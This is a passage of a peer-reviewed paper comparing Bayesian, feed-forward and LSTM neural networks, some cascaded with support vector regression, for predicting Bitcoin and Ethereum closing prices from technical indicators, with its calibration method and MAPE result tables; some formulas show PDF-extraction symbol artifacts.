10.7717/peerj-cs.413 5/23 http://dx.doi.org/10.7717/peerj-cs.413/fig-4 http://dx.doi.org/10.7717/peerj-cs.413 https://peerj.com/computer-science/ work by Mallqui & Fernandes (2019) the authors select the relevant inputs for their prediction problem, but the selection of the relevant inputs is done using the correlation analysis, the relief technique, the information gain method, the principal component analysis, and the correlation based feature subset selection. In the work by Mallqui & Fernandes (2019) the authors predict both the Bitcoin price and its movements, hence solve both a classification problem and a regression problem by different ML algorithms, Recurrent Neural Network, Tree classifier and the SVM algorithm. Owing to the low number of inputs taken into account in our work, we did not apply any selection method. We simply evaluated the performance of the proposed frameworks at varying the number of inputs taken into account, finding that the best performance of the BNN is obtained taking into account all five technical indicators. Our future work is to investigate the performance of the proposed frameworks under the assumption of a higher number of inputs, which includes also blockchain information, tweet volumes and sentiment analysis. Twitter data and Google trends data are used by Abraham et al. (2018) in order to predict changes in the prices of both Bitcoin and Ethereum. In this work, the authors predict the direction of price changes by a linear model. In the work by Huang, Huang & Ni (2018) the authors investigated cryptocurrency return predictability, specifically the bitcoin return predictability. They forecast the bitcoin daily return using a tree-based predictive model and 128 technical indicators as input. Results showed that their predictive model has strong predictive power and performance higher than those obtained by a buy-and-hold strategy. As a result, work by Huang, Huang & Ni (2018) suggests that in the bitcoin market technical analysis can result useful. A similar result is obtained in the work by Cocco, Tonelli & Marchesi (2019), who simulate the trading of the currency pair BTC/USD. They simulate a BTC/USD artificial market in which Chartists (speculators) trade through the application of trading rules based on technical indicators, and Random traders trade without applying any specific trading strategy. Results show that Chartists, who adopt the trading rules selected by a genetic algorithms that optimizes their parameters, are able to achieve higher profits. Let us quote other relevant works. Shintate & Pichl (2019), Ji, Kim & Im (2019), Livieris et al. (2020), Lamothe-Fernández et al. (2020), and Chen, Li & Sun (2020) predicted Bitcoin price at different frequencies using several machine learning techniques and investigating the importance of the sample dimension. Greaves & Au (2015) investigated the predictive power of blockchain network-based features on the bitcoin price. They found a low predictive power embedded in these network features probably because Bitcoin price is technically dictated by exchanges’ behaviors. Akcora et al. (2018) introduced the concept of k-chainlets expanding the concepts of motifs and graphlets to Blockchain graphs. They found that certain types of chainlets have a high predictive power for Bitcoin prices. Lahmiri & Bekiros (2019) implemented deep learning techniques to forecast the price of the three cryptocurrencies, Bitcoin, Digital Cash and Ripple, finding that these three digital currencies exhibit fractal dynamics, long memory and self- similarity. Indera et al. (2018) presented a Multi-Layer Perceptron-based Non-Linear Autoregressive with Exogeneous Inputs (NARX) model to predict Bitcoin price starting from the opening, closing, minimum, maximum past prices and a technical indicator, the Cocco et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.413 6/23 http://dx.doi.org/10.7717/peerj-cs.413 https://peerj.com/computer-science/ well-known Moving Average. Munim, Shakil & Alon (2019) forecasted Bitcoin price using the autoregressive integrated moving average (ARIMA) and neural network autoregression (NNAR) models. Uras et al. (2020) segmented each analyzed financial time series into short partially overlapping sequences in such a way that these sequences do not resemble a random walk. The authors identified a train and a test set within each time regime/sequence. Then, in each identified sequence they applied different forecasting procedures—Simple Linear Regression, Multiple Linear Regression, Multilayer Perceptron and the Long short-term memory. Mudassir et al. (2020) presented high-performance machine learning-based classification and regression models for predicting Bitcoin price movements and prices in short and medium terms. Among the machine learning techniques used by the authors there is the stacked ANN (SANN), constituted of 5 ANN models that are used to train a larger ANN. The SANN was trained using the training dataset and the 5-fold cross-validation, by training each of 5 ANN models on a separate fold. The final larger ANN learns from these five models, that is, it trains on the outputs of the five individual smaller ANNs. All the cited works focus on end-of-day closing price forecast and/or price movements forecasting for the next day prices, but the work by Patel et al. (2015) and the last work quoted, that by Mudassir et al. (2020). The former focuses on forecasts for 1–10, 15 and 30 days in advance, instead the latter focuses on end-of day, short-term (7 days) and mid-term (30 and 90 days) forecasts. In this work we focus on end-of day, short-term (10 days) and mid-term (20 days) forecasts. Finally, we quote the works by Jang et al. (2018), Chih-Hung, Yu-Feng & Chih-Hung (2018), Pant et al. (2018), McNally, Roche & Caton (2016), Phaladisailoed & Numnonda (2018), Roy, Nanjiba & Chakrabarty (2018), and by Velankar, Valecha & Maji (2018) that are published in the proceedings of recent international conferences and deal with the prediction of the bitcoin price using machine learning techniques. To the best of our knowledge, our work is the first attempt of predicting the bitcoin price investigating the best architecture by the so called k-fold cross-validation method, applying it only to a part of the whole dataset, as described in details in Section Framework’s Calibration and Performance Metric. In modern applied machine learning in order to tune model hyper parameters the definition of the k-fold cross-validation method often replaces the definitions of training, validation and test data set for preventing overfitting. In their book Kuhn & Johnson (2013) wrote: …we must use the existing data to identify settings for the model’s parameters that yield the best and most realistic predictive performance (known as model tuning). Traditionally, this has been achieved by splitting the existing data into training and test sets. The training set is used to build and tune the model and the test set is used to estimate the model’s predictive performance. Modern approaches to model building split the data into multiple training and testing sets, which have been shown to often find more optimal tuning parameters and give a more accurate representation of the model’s predictive performance. Cocco et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.413 7/23 http://dx.doi.org/10.7717/peerj-cs.413 https://peerj.com/computer-science/ This is because using a sole test set or a validation set has many limitations, as discussed by Kuhn & Johnson (2013), Brownlee (2017c), Anguita et al. (2012), and Rodriguez, Perez & Lozano (2010). It is worth underlining that every machine learning model always has some error because it is a model. Kuhn & Johnson (2013) wrote: Many modern classification and regression models are highly adaptable; they are capable of modeling complex relationships. However, they can very easily overemphasize patterns that are not reproducible. Without a methodological approach to evaluating models, the modeler will not know about the problem until the next set of samples are predicted. In statistics a common aphorism, that is generally attributed to the statistician George Box, goes All models are wrong and is often expanded as All models are wrong but some are useful. This aphorism applies also to the choice and preparation of data, choice of hyperparameters, and the interpretation of model predictions. In this work we attempted of predicting the bitcoin price investigating the best architecture by the k-fold cross-validation method, and using the Monte Carlo method to handle the stochastic nature of the neural networks, hence providing statistics to summarize the performance of the best selected models. This approach is not always applicable due to the long training times of some models. The Monte Carlo method as well as all methods and tools from probability provide a way to handle the random nature of the predictive modeling problems. Note that, as we are going to describe in next sections, our results are comparable with those in literature despite the proposed frameworks are relatively simple in comparison to those proposed previously in literature. There are works that propose a framework using a high number of inputs, deep neural networks (DNN), convolutional neural networks (CNN) and complex stacking ensemble models (see for example the ensemble model proposed by Ji, Kim & Im (2019), in which the first level consists DNN, LSTM, and CNN, and the second level consists of a single DNN model). PROPOSED FRAMEWORKS In this work we compare the performance of the single stage frameworks, formed by an NN (BNN, FFNN, or LSTMNN), with the performance of the two stages frameworks, formed by an NN in cascade to an SVR. All frameworks aim to predict the daily closing Bitcoin and Ethereum price at (t + n)th day, with n = 1, n = 10, and n = 20, starting from the value of five technical indicators, SMA, EMA, MOM, RSI and MACD, at tth day. In the following we briefly describe the technical indicators and the ML techniques adopted in this work. Technical indicators The five indicators above mentioned are indicators well known in the technical analysis2 (Kirkpatrick & Dahlquist, 2006). They are mathematical constructions used to process 2 Technical analysis forecasts the move- ments of the financial assets’ prices through the study of past market data, such as price and volume. Cocco et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.413 8/23 http://dx.doi.org/10.7717/peerj-cs.413 https://peerj.com/computer-science/ data, for example on the price trend and on the volumes traded of a financial security in order to predict its future price performance and get buy and sell signals3. Moving averages Moving averages, SMA and EMA, are basic indicators for determining price trends. They are defined as follows: SMAt ¼ 1 n Xn 1 Pt (1) and EMAt ¼ EMAt�1 þ 2 n þ 1 ðPt � EMAt�1Þ (2) where P is the price and n is the used period. Both are calculated by averaging a certain number of past data. The main difference is that in the EMA the data are weighted, and old data have less weight than recent data4. Owing to the high volatility of the bitcoin price, we dealt with short term moving averages, which usually take into account periods between 5 and 20 days. In this work we considered moving average on periods equal to 5 days. Oscillators Contrary to the moving averages, MACD, RSI and MOM are called oscillators because their value oscillates in a sinusoidal manner between a minimum and a maximum. They can be useful for identifying points of excessive price increase or excessive price decrease, and points of possible change in the direction of prices. MACD considers the difference between the values of two moving averages (MACD line), one is a short period EMA and the other is a long period EMA, together with an exponential moving average of this difference (signal line) and a histogram given by the distance between the MACD line and the signal line. It is defined as follows: shortEma ¼ 0:15Pt þ 0:85shortEmat�1 (3) longEma ¼ 0:075Pt þ 0:925longEmat�1 (4) and MACD ¼ shortEma � longEma (5) 12 and 26-day averages usually determine the MACD line, while the 9-day average determines the signal line. In this work we considered these values to compute the MACD. RSI is a technical indicator of momentum useful for identifying the phases of oversold and overbought asset. It is defined as follows: RSI ¼ 100 upavg upavg þ dnavg (6) 3 For more details see http://mrjbq7. github.io/ta-lib/funcs.html, a link in which the functions of the library TA- Lib, used to compute these technical indicators, are explained. 4 EMA value at t is based on the previous EMA value at t :amp:minus; 1. The initial value for EMA at t :amp:minus; 1 will be an SMA value calculated using a period equal to that used in EMA. Cocco et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.413 9/23 http://mrjbq7.github.io/ta-lib/funcs.html http://mrjbq7.github.io/ta-lib/funcs.html http://dx.doi.org/10.7717/peerj-cs.413 https://peerj.com/computer-science/ where upavg ¼ upavgt�1 � ðn � 1Þ þ up n dnavg ¼ dnavgt�1 � ðn � 1Þ þ dn n and n is the used period to compute this indicator, up = Pt − Pt−1 and dn = 0 if Pt > Pt−1, otherwise up = 0 and dn = Pt−1 − Pt. Areas of overbought indicate a time when prices go too far above their average period, and given that the price is now too high we can expect an imminent return of prices downwards (sell signal). Areas of oversold indicate a time when prices have pushed too low compared to their average and therefore we expect an imminent bullish return movement towards their average (buy signal). RSI values range from 0 to 100. Over 70 points there is an overbought signal, and under 30 an oversold signal. MOM measures the rate of change of any instrument. It compares the current price with the price of some previous periods: MOM ¼ Pt � Pt�n (7) In this work we set the period used by this oscillator equal to 9 days. Machine learning techniques All ML techniques adopted in this work operate in a supervised context. The training takes place by presenting to the network inputs (training dataset) whose output is known, hence by presenting to the network the data set (xn, yn), where each data point in input xn 2 RD, whereas the output yn 2 R. Bayesian neural network Contrary to other types of neural networks, such as the FF and the LSTM, which find a weighted array that maximizes the fitting of the NN outputs with respect to training outputs, following the principle of Maximum Likelihood, the BNNs follow the Bayesian approach. In the Maximum Likelihood, the learning aims at finding a single network—“the best”—the one that makes the smallest error on training data. As a result, at the end of the training, we get a single weight array. On the contrary the Bayesian Approach considers a probability distribution for the weights. At the end of the training we have more than one network and the output is computed as the expected value of the outputs generated by all these networks. In deeper detail, in an BNN the weights and the outputs are assumed to be sampled from a distribution. Let us define the BNN taken into account in this work. It has an input with D dimensions and two hidden layers, whose dimensions are HL1 and HL2, Cocco et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.413 10/23 http://dx.doi.org/10.7717/peerj-cs.413 https://peerj.com/computer-science/ respectively. For such a network the parameters u ¼ v0; v1; v2; b0; b1; b2f g are defined as follows: v0 2 RD�HL1; v1 2 RHL1�HL2; v2 2 RHL2�1; b0 2 RHL1; b1 2 RHL2; and b2 2 R The activation functions that allow to pass from a layer to another are defined by rectified linear unit activations, hence our NN network is defined as follows5: NN : RD ) RHL1 ) RHL2 ) R and a data point in input x pass through the following layers: x ) h1 ¼ maxð0; v0Tx þ b0Þ ) h2 ¼ maxð0; v1Tx þ b1Þ ) v2Th2 þ b2 The prior distribution on the weights is defined as a standard normal distribution, as follows: pðuÞ ¼ Normalðuj0; IÞ (where 0 is a zero matrix and I is a identity matrix), and the likelihood for each data point (x, y) is given by: pðyjx; uÞ ¼ pðDjuÞ ¼ NormalðyjNNðx; uiÞ; s2Þ where D denotes the training dataset, hence it represents all data points to be presented to the network during the training, and s2y is a fixed variance set equal to 1. Given the prior and the likelihood, the posterior distribution p(θ, x) is approximated by a parametrized family q(θ, λ) through a variational inference method6 minimizing the Kullback–Leibler divergence between the two distributions q and p. Note that the data are scaled to be centered and have unit variance. Once estimated the posterior distribution, that is the distribution of the weights θ of the BNN, we can compute the posterior predictive distribution for testing data points in input xtest. This distribution is given by: pðyjxtest; uÞ ¼ Z NormalðyjNNðx; uÞ; s2ÞpðujDÞdu it can be computed using the Monte Carlo approximation: pðyjxtest; uÞ� 1 nsamples Xnsamples�1 i¼0 NðyjNNðxtest; uiÞ; s2Þ we sampled it from the posterior, that is from the distribution q(θ, λ *). This implies sampling the weights θ, which gives NN(xtest, θi) with i ¼ 0 . . . M where M is the number of extracted samples. M values of NN(xtest,θi), that is M values of y, are associated to each data point xtest belonging to the testing dataset. Since to each xtest in input must correspond in output only 5 See http://edwardlib.org/tutorials/ bayesian-neural-network and https:// github.com/mikkokemppainen/Jupyter_ notebooks/blob/master/Edward_ notebook_public.ipynb. 6 See http://edwardlib.org/tutorials/klqp. Cocco et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.413 11/23 http://edwardlib.org/tutorials/bayesian-neural-network http://edwardlib.org/tutorials/bayesian-neural-network https://github.com/mikkokemppainen/Jupyter_notebooks/blob/master/Edward_notebook_public.ipynb https://github.com/mikkokemppainen/Jupyter_notebooks/blob/master/Edward_notebook_public.ipynb https://github.com/mikkokemppainen/Jupyter_notebooks/blob/master/Edward_notebook_public.ipynb https://github.com/mikkokemppainen/Jupyter_notebooks/blob/master/Edward_notebook_public.ipynb http://edwardlib.org/tutorials/klqp http://dx.doi.org/10.7717/peerj-cs.413 https://peerj.com/computer-science/ one value of y, we have to compute the posterior predictive distribution for each xtest in the testing dataset. Due to the computational complexity, we grouped all the sample predictions into histograms forming the posterior predictive distribution as a mixture distribution according to these histograms7. We computed the prices’ prediction sampling from this mixture, computing the mean. Feed forward and long short term memory neural network As regards the other two neural networks taken into account in this work, the FFNN and the LSTMNN, the main difference between them is that the former is composed of a series of layers of neurons connected without cycles, whereas the latter is characterized by the presence of cycles and is able to consider long-term dependencies among data. Specifically, we implemented an FFNN, composed of 3 layers, an input layer, a hidden layer and an output layer as in work by Patel et al. (2015). The input layer takes in input the five technical indicators, and the output layer predicts the price at (t + n)th day. We initialized the network’s weights to a random number generated from a uniform distribution, used a tangent sigmoid as activation function in the first two layers, and a linear activation function in the output layer, as in the work Patel et al. (2015). The output layer of the neural network has only one neuron and the value, it returns, is compared with the true value. We implemented an LSTMNN having a visible layer with in input the five technical indicators, a hidden layer with nn neurons, also called LSTM blocks, and an output layer that predicts the price at (t + n)th day. The default sigmoid activation function is used for the LSTM blocks. We trained both the networks for ne epochs and used a batch size of nb and Adam as optimization algorithm to update network weights (Kingma & Adam, 2015). This algorithm is based on the gradient descent that minimizes an objective function, in our case the mean absolute error (MAE) of the output produced by the NNs with respect to the desired output. Support vector regression Let us conclude this brief overview with the ML technique used in the two stages frameworks, SVR. It belongs to a set of supervised learning methods that can be used both for classification and for regression computation. In a problem of classification, this technique is called Support vector machines (SVM). For instance, it can be used to divide the set of training data in two classes; an SVM is able to identify the hyperplane having the maximum margin of separation between the two classes. To this purpose, the training data set is mapped in a space called feature space using non-linear functions, ψ, called feature functions, which are a combination of the so called kernel functions. They map a lower dimensional data into a higher dimensional data. In a regression problem, SVR tries to keep the fitting error within a certain threshold. Indeed, the goal of this ML technique is to find a function ψ that deviates from the observed value by a value no greater than ε for each training point. 7 A mixture distribution is the probability distribution of a random variable that is derived from a collection of other ran- dom variables as follows: first, a random variable is selected by chance from the collection according to given prob- abilities of selection, and then the value of the desired random variable is obtained (http://edwardlib.org/api/ed/ models/Mixture). Cocco et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.413 12/23 http://edwardlib.org/api/ed/models/Mixture http://edwardlib.org/api/ed/models/Mixture http://dx.doi.org/10.7717/peerj-cs.413 https://peerj.com/computer-science/ The kernel functions more used, and adopted also in this work are the following. � Linear: Kðxi; yjÞ ¼ xTi yj. � Polynomial: Kðxi; yjÞ ¼ ðcxTi yj þ rÞd, being d the degree of the polynomial function. � Radial basis function: K(xi,yj) = exp(−γ||xi − xj||2), with γ > 0. FRAMEWORKS’ CALIBRATION AND PERFORMANCE METRIC We analyzed the time series of Bitcoin and Ethereum daily closing prices. Specifically, the dataset taken into account includes daily closing price’s values from January 1st, 2017 to April 30th, 2020, for a total of 1,216 values. Starting from these series we computed the time series of the five technical indicators, that are the inputs of our frameworks, and the features xn of the dataset (xn, yn), including the training and testing datasets. The bitcoin daily price time series defines the output yn of such dataset. Summary statistics for the five inputs and the output are described in Table 1 for Bitcoin and Ethereum price time series. To evaluate the performance of the proposed single stage and of the two stages frameworks, we computed the Mean Absolute Percentage Error (MAPE), defined as follows: � 1 n Xn t¼1 jAt � Ftj jAtj � 100 where At and Ft are the actual and forecast prices, respectively, at time t. As regards the calibration of the used ML techniques, we tuned the model hyper parameters, that is the parameters whose values are set before starting the learning process, using the k-fold cross-validation method (see works by Kuhn & Johnson (2013), Table 1 Summary statistics for the five inputs and the output for Bitcoin and Ethereum prices. Max Min Mean Standard deviation BTC SMA 18,380.97 970.58 6,584.88 3,278.79 EMA 18,166.92 977.8 6,585.17 3,270.38 MOM 5,725.74 −4,786.35 52 1,102.21 MACD 2,546.46 −1,447.3 36.69 432.44 RSI 97.84 5.91 53.72 18.66 CLOSE 19,237.15 924.1 6,597.43 3,285.75 ETH SMA 1,296.65 10.79 292.26 233.62 EMA 1,302.17 10.84 292.27 233.08 MOM 543.01 −452.89 1.41 76.07 MACD 173.3 −94.25 0.95 29.81 RSI 94.54 10.77 52.08 17.61 CLOSE 1,396.42 11.03 292.59 234.34 Cocco et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.413 13/23 http://dx.doi.org/10.7717/peerj-cs.413 https://peerj.com/computer-science/ Brownlee (2017c), and Rodriguez, Perez & Lozano (2010)). The k-fold cross-validation method implies the creation of several neural network architectures and the training of every architecture at each k-fold. For each architecture and for each k-fold the MAPE value is computed. The average of the MAPE’s k values across the k-folds for a given architecture represents the performance of that architecture. The architecture with the lowest average is the best. It represents the model that has to be trained on all data. The k-fold cross-validation method works as described by the following pseudo-code: START: #split data into training and testing dataset trainData, testData = split(allData) #tune parameters of the model parameters = … k = … archSkills = list() for p in parameters do k-fold_skills = list() for i in do k-fold _train, k-fold_val = split(i, k, trainData) model = fit (k-fold-train, p) skill_estimate = evaluate(model, k-fold_val) end for # for each k-fold calculate MAPE and store the average skill = summarize(k-fold_skills) archSkills.append(skill) end for #evaluate the model with the best tuning with all data model = fit(trainData) skill = evaluate(model, testData) END. We applied the k-fold cross-validation method with k = 3–70% of the whole dataset. We used the k-fold method with an expanding window, hence we divided the data set in three folds/splits as illustrated in Fig. 58. As underlined by Kuhn & Johnson (2013) a formal rule to choose the value of k does not exist. Since our data set size is not large enough three should be an acceptable value for k. We repeated the k-fold cross-validation method several times, choosing at the end the tuning that provides the architecture having the best performance. As regards the hyper parameters of the BNN, one, two, and three hidden layers, nhl, were tested, with combinations of 50, 100, 200, 300, 400 and 500 neurons, nn. As regards the hyper parameters of the other ML techniques adopted (FFNN, LSTMNN and SVR), they were selected running sixty Monte Carlo runs, and taking in each run a different constellation. The hyper parameters that must be selected, are the number of epochs, ne, the number of neurons, nn, the number of batches, nb, the degree of the polynomial kernel, d, the value of γ (that is a parameter of the radial basis kernel). For each of them 8 We tested the k-fold method with both an expanding window and a sliding window, and at the end we chose an expanding window given that with it we obtained the best results. Cocco et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.413 14/23 http://dx.doi.org/10.7717/peerj-cs.413 https://peerj.com/computer-science/ we defined the range in which they vary, as follows9: ne ∈ [50, 500], nn ∈ [20, 100], nb ∈ [5, 100], d ∈ [1, 10], γ ∈ [0.1, 100]. Once the best architecture is selected, we train it with all data, considering the testing set equal to 30% of the whole data set, that is the part of the data set not used in the k-fold method. To evaluate the robustness of the selected architecture’s performance we repeated this procedure forty times, applying the so called Monte Carlo method. The performance of each proposed framework are measured by the average and the standard deviation of the MAPE’s values across the Monte Carlo runs10,11. RESULTS As just described, to tune our frameworks we applied the k-fold cross-validation method to 70% of the whole data set, using k = 3, an expanding window, and respecting the temporal order of the series. For each defined architecture, we applied this method computing the prediction at (t + n)th day ahead of time, with n = 1 and the MAPE’s values for each fold. The k-fold cross-validation method was run once for each different constellation of the main parameters of each framework, since our goal is to select the best model/architecture for ANN and the best model for BNN, in order to compare the performance of these two kind of NNs. Table 2 reports the measure of the best performance for each proposed framework, and their hyper parameters, ne, nn, nb, γ, d, and nhl. Precisely for all frameworks under study, the average and the standard deviation (values in brackets) of the MAPE’s values across the k-folds are described. The analysis performed highlighted the following patterns (see Table 2). Firstly, the two stages frameworks perform better than the correspondent one stage frameworks, but for the BNN and SVR(r)+LSTMNN. Secondly, the ANN’s performance is higher than those of BNN. Thirdly, the two stages frameworks composed of SVR, using a linear kernel function performs better than other two kinds of kernels. For ANN the best architecture selected corresponds to a two stages framework, composed of SVR + LSTMNN, in which the SVR uses a linear kernel function and the LSTMNN uses for training ne = 319, nn = 99 , and nb = 87. For this framework we obtained the lowest average of the MAPE’s values across the k-folds. This average value is equal to 2.66 (std. 0.08). Figure 5 The figure shows as 70% of the whole data set is divided into 3-folds/splits, and as the expanding window approach, used to cross validation, works. Full-size DOI: 10.7717/peerj-cs.413/fig-5 9 Note that all the parameters not men- tioned here are defined as described in Section Proposed Frameworks or, given that we used the well known python libraries, sklearn and keras, are set equal to the default values. 10 It is worth to underline that a classifi- cation model could also be considered, since low MAPE values do not neces- sarily mean that the model predicts the price rise and fall correctly. Classifica- tion models will be taken into account in our future work, but they are out of scope of this first paper. 11 In this work we trained all our frameworks for some days on a laptop with an Intel(R) Core(TM) i5-7200U CPU @ 2.50 GHz 2.71 GHz, 16 GB RAM and Graphic card Intel HD 620. Cocco et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.413 15/23 http://dx.doi.org/10.7717/peerj-cs.413/fig-5 http://dx.doi.org/10.7717/peerj-cs.413 https://peerj.com/computer-science/ Contrary to ANN, for BNN the k-fold cross-validation method identifies, as the best architecture, the one stage framework, in which the BNN follows the configuration described in section Bayesian Neural Network, with two hidden layers and 300 neurons. For this framework the average of the MAPE’s values across the k-folds, is equal to 7.7 (std. 0.39). Once selected the best models we trained the model using the whole data set and compared the results. In order to evaluate the robustness of the selected models we run forty Monte Carlo runs, computing for each run the MAPE value at (t + n)th day ahead of time, with n = 1, n = 10, and n = 20. For ANN, and specifically, for the SVR+LSTMNN the average and standard deviation of the MAPE’ values across Monte Carlo simulation are equal to 1.95 and 0.18, to 5.94 and 0.04, and to 6.33 and 0.13, respectively for n = 1, n = 10, and n = 20 day ahead of time. For BNN the average and standard deviation of the MAPE’ values across Monte Carlo simulation are equal to 1.74 and 0.09, to 3.85 and 0.24, and to 10.2 and 0.4, respectively for n = 1, n = 10, and n = 20 day ahead of time. Of course all these values of MAPE increase while n goes from 1 to 10 and to 20, since the performance decreases while the day ahead of time increases (see Table 3)12. Table 2 Parameters and statistics of the best selected architecture for each proposed framework, in order to predict the Bitcoin price, are described. Statistics represent the average and standard deviation (in brackets), across the k-folds with k = 3, of the MAPE values. Note that (r) stands for SVR with a radial kernel function, (l) stands for SVR with a linear kernel function, and (p) stands for SVR with a poly- nomial kernel function. The bold entries highlight the framework with the lowest average of the MAPE’s values across the k-folds. LSTMNN SVR (r) + LSTMNN SVR (l) + LSTMNN SVR (p) + LSTMNN # epochs 83 330 319 136 # neurons 50 22 99 93 # batchs 40 96 87 98 γ 11.53 d 1 avg (std) 5.79 (1.00) 6.76 (1.56) 2.66 (0.08) 2.7 (0.31) FFNN SVR (r) + FFNN SVR (l) + FFNN SVR (p) + FFNN # epochs 224 440 421 490 # neurons 30 68 98 85 # batchs 43 17 98 47 γ 0.17 d 1 avg (std) 5.72 (1.39) 3.25 (0.06) 2.96 (0.51) 3.44 (0.65) BNN SVR (r) + BNN SVR (l) + BNN SVR (p) + BNN nhl 2 2 2 2 # neurons 300 300 300 300 γ 55.45 d 3 avg (std) 7.7 (0.39) 9.46 (4.34) 8.49 (3.34) 207 (171.83) 12 Note that the procedure for tuning the model hyperparameters using the k-fold cross-validation method was applied considering the BTC price prediction at (t + n)th day ahead of time, with n = 1. It has to apply for each n ! = 1 to select for each n the best architecture. Cocco et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.413 16/23 http://dx.doi.org/10.7717/peerj-cs.413 https://peerj.com/computer-science/ These results show that predicted bitcoin prices by the BNN with n = 1 have a MAPE very similar to that found by Mallqui & Fernandes (2019), albeit the periods analyzed are different. In fact, our work considers time series that range from January 1st, 2017 to April 31st, 2020; Mallqui & Fernandes (2019) considered two different periods. They found a MAPE value equal to 1.91 for the first interval, ranging from August 19th, 2013 to July 19th, 2016, and equal to 1.81 for the second interval ranging from April 1st, 2013 to April 1st, 2017, very close to our MAPE value of 1.74 and 1.95 respectively obtained applying BNN and SVR+LSTM. Our predicted BTC prices are also very close to that finding in the work by Mudassir et al. (2020) by applying the so called SVM and considering the interval from April 1, 2013 to December 31, 2019, hence considering also the BTC prices after April 2017, as we did. The highest volatility of the BTC prices was after April 2017, as underlined in the work just quoted. Mudassir et al. (2020) considered three data intervals: from April 1, 2013 to July 19, 2016; from April 1, 2013 to April 1, 2017; and the interval from April 1, 2013 to December 31, 2019. For the last of the three intervals the authors found a MAPE value of 3.78 for ANN, of 3.61 for LSTMNN, 1.44 for SVM, and of 2.73 for SANN. Lower MAPE values were found for the first two intervals. This is because the BTC prices volatility is not much high, and BTC prices are relatively stable, even if in the second interval BTC prices are noticeably higher toward the end. Similar analysis was performed also for another cryptocurrency, specifically for Ethereum. Obtained results are shown in Tables 4 and 5. Results described in Table 4 highlight that the two stages frameworks for ANN, composed of SVR, using linear and polynomial kernel functions, perform better than the correspondent one stage frameworks and two stages framework composed of SVR, using a radial kernel function; and the BNN’s performance is higher than all the others. Table 5 describes the average and standard deviation of the MAPE’s values across Monte Carlo simulations for the best selected architecture, SVR+FFNN and BNN. Best results are obtained for BNN as in the case of Bitcoin even if the MAPE value is slightly higher for Etherem, 2.77 (0.61) vs. 1.74 (0.09) for Bitcoin. Note that also in this case MAPE values increase while n goes from 1 to 20. We conclude this section presenting the predicted Bitcoin prices at (t + 1)th day ahead of time by the BNN in one of the Monte Carlo simulations performed. Table 6 describes the mean, the standard deviation, and the 0.01 and 0.99 quantiles of just ten predicted values, and gives an idea of how much the predicted values differ from the true values for Table 3 Average and standard deviation (in brackets) for MAPE values across the performed MC runs obtained by training the selected best architectures using the whole data set to predict Bitcoin price. SVR (l) + LSTMNN BNN n = 1 1.95 (0.18) 1.74 (0.09) n = 10 5.94 (0.04) 3.85 (0.24) n = 20 6.33 (0.13) 10.2 (0.4) Cocco et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.413 17/23 http://dx.doi.org/10.7717/peerj-cs.413 https://peerj.com/computer-science/ n = 1. The first column in the table describes the actual value of the Bitcoin price. Specifically these prices refer to the bitcoin price from May 12th, 2019 to May 21st, 2019. They are the first ten values of the Bitcoin price into the testing dataset. The second column describes the average values predicted by the BNN for each actual value reported in the first column. Remember that the output of the BNN are assumed to be sampled from a distribution, consequently to give an idea of the results’s goodness in the Table we illustrate for each predicted price also the standard deviation, and the 0.01 and 0.99 quantiles. For this Monte Carlo simulation the MAPE value is equal to 1.71. Table 4 Parameters and statistics of the best selected architecture for each proposed framework, in order to predict the Ethereum price, are described. Statistics represent the average and standard deviation (in brackets), across the k-folds with k = 3, of the MAPE values. Note that (r) stands for SVR with a radial kernel function, (l) stands for SVR with a linear kernel function, and (p) stands for SVR with a polynomial kernel function. The bold entries highlight the framework with the lowest average of the MAPE’s values across the k-folds. LSTMNN SVR (r) + LSTMNN SVR (l) + LSTMNN SVR (p) + LSTMNN # epochs 212 172 445 199 # neurons 100 83 44 35 # batchs 21 20 54 21 γ 66.78 d 1 avg (std) 6.04 (1.6) 6.44 (2.18) 3.44 (0.61) 3.6 (0.58) FFNN SVR (r) + FFNN SVR (l) + FFNN SVR (p) + FFNN # epochs 85 295 284 284 # neurons 95 31 99 99 # batchs 19 59 56 56 γ 76.56 d 1 avg (std) 5.73 (1.12) 7.53 (2.89) 3.31 (0.54) 3.26 (0.53) BNN SVR (r) + BNN SVR (l) + BNN SVR (p) + BNN nhl 2 2 2 2 # neurons 300 300 300 300 γ 49.31 d 3 avg (std) 4.91 (2.7) 13.2 (8.21) 8.1 (3.43) 54.1 (46.6) Table 5 Average and standard deviation (in brackets) for MAPE values across the performed MC runs obtained by training the selected best architectures using the whole data set to predict Ethereum price. SVR (p) + LSTMNN BNN n = 1 2.84 (0.76) 2.77 (0.61) n = 10 8.45 (1.00) 4.03 (0.15) n = 20 8.45 (1.78) 8.87 (0.68) Cocco et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.413 18/23 http://dx.doi.org/10.7717/peerj-cs.413 https://peerj.com/computer-science/ CONCLUSIONS In this article, several ML frameworks to forecast Bitcoin and Ethereum prices are comparatively tested. They are divided into one stage frameworks and two stages frameworks. The formers are frameworks based on just one ML technique. The latters are based on two ML techniques working in cascade. We used three one stage frameworks, and three two stages ones. The first three use different NN models. Specifically, we considered BNN, FFNN and LSTMNN. The second ones use an FFNN, an LSTMNN, and an BNN, each of them in cascade to an SVR. The goal of this work was to analyze the performance of BNN in the forecasting the Bitcoin and Ethereum daily closing prices, and to compare it with those obtained using FFNN and LSTMNN, considering both the typologies of frameworks. All frameworks attempt to predict the prices starting from five technical indicators, SMA, EMA, MOM, MACD, and RSI. Specifically, in the one stage frameworks starting from the value of these five technical indicators at tth day, we predicted the daily closing price at (t + n)th day, with n = 1, n = 10, and n = 20. In the two stages frameworks the first stage, formed by an SVR, receives in input the five technical indicators at tth day and predicts the value of the five technical indicators at (t + n)th day; the second stage receives in input the estimate of five technical indicators at (t + n)th day and predicts the daily closing price at (t + n)th day. We tuned all the proposed framework applying the k-fold cross-validation method to 70% of the whole data set. We created several models training them at each k-fold, hence computing for each fold a MAPE’s value. Then, for each model we computed the average of the 